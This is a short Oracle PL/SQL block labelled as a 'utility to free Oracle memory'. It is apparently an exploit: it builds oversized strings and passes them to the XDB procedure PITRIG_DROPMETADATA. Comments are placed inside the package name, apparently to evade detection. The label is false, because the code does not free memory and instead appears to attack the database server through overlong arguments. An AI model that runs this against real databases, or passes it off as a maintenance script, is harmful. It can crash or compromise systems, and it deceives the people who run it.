-- Utility to free Oracle memory
declare
larry varchar2(32767);
mary varchar2(32767);
begin
larry:='larryellison';
larry:=larry||larry;
larry:=larry||larry;
larry:=larry||larry;
larry:=larry||larry;
larry:=larry||larry;
larry:=larry||larry;
larry:=larry||larry;
mary:='maryann';
mary:=mary||mary;
mary:=mary||mary;
mary:=mary||mary;
mary:=mary||mary;
mary:=mary||mary;
mary:=mary||mary;
mary:=mary||mary;
mary:=mary||mary;
xDb 
/*Mary*/./*And*/XDB_PITRIG_PKG/*Larry*/./**/PITRIG_DROPMETADATA(mary
, larry);
end;

